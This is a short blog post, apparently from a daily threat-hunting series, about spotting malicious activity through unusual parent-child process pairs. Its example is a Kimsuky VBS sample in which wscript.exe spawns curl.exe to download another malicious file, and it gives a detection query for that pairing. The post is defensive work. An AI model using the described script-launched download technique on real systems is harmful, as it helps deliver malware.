185. Using Process Parent and Children Relationships for Detection and Hunting
Hello everyone!
Today we're going to talk about some basics. But such basics are extremely important to document and use. I'm talking about process parent and children relationships.
The thing is, some processes may rarely or never spawn some other processes in a legitimate way. So if you see such behaviour marker, it's most likely related to malicious activity. But the problem is - there can be many and many variants of such markers.
Let's look at an example, which belongs to Kimsuky. It's a malicious VBS file. If we look at it closely, we can see that in this case wscript.exe spawns curl.exe to download another malicious file. And this is an example of behavior marker we can use for detection or hunting:
event_type: "processcreatewin"
AND
proc_p_file_path: "wscript.exe"
AND
proc_file_path: "curl.exe"
See you tomorrow!
Comments
Post a Comment